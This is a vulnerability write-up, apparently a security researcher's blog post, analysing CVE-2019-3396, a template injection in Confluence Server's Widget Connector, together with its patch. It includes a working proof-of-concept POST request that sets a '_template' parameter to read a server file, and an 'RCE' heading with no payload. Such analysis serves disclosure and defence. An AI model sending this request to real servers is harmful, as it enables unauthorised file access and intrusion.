【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Analysis

According to the document , there are three parameters that you can set to control the content or format of the macro output, including URL、Width and Height.

the Widget Connector has defind some renders. for example the FriendFeedRenderer:

public class FriendFeedRenderer implements WidgetRenderer
{
  ...
  
  public String getEmbeddedHtml(String url, Map<String, String> params) {
    params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
    return this.velocityRenderService.render(getEmbedUrl(url), params);
  }
}

In FriendFeedRenderer‘s getEmbeddedHtml function , you will see they put another option _template into params map.

However, some other renderers, such as in video category , just call render(getEmbedUrl(url), params) directly

So in this situation, we can "offer" the _template ourseleves which the backend will use the params to render

Reproduce

POST /rest/tinymce/1/macro/preview HTTP/1.1

{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}

RCE

Patch

in fix version, it will call doSanitizeParameters before render html which will remove the _template in parameters. The code may like this:

public class WidgetMacro
  extends BaseMacro
  implements Macro, EditorImagePlaceholder
{
  public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory)
  {
    ...
    this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
  }
  
  ...

  public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
    ...
    doSanitizeParameters(parameters);
    
    return this.renderManager.getEmbeddedHtml(url, parameters);
  }
  
  private void doSanitizeParameters(Map<String, String> parameters)
  {
    Objects.requireNonNull(parameters);
    for (String sanitizedParameter : this.sanitizeFields) {
      parameters.remove(sanitizedParameter);
    }
  }
}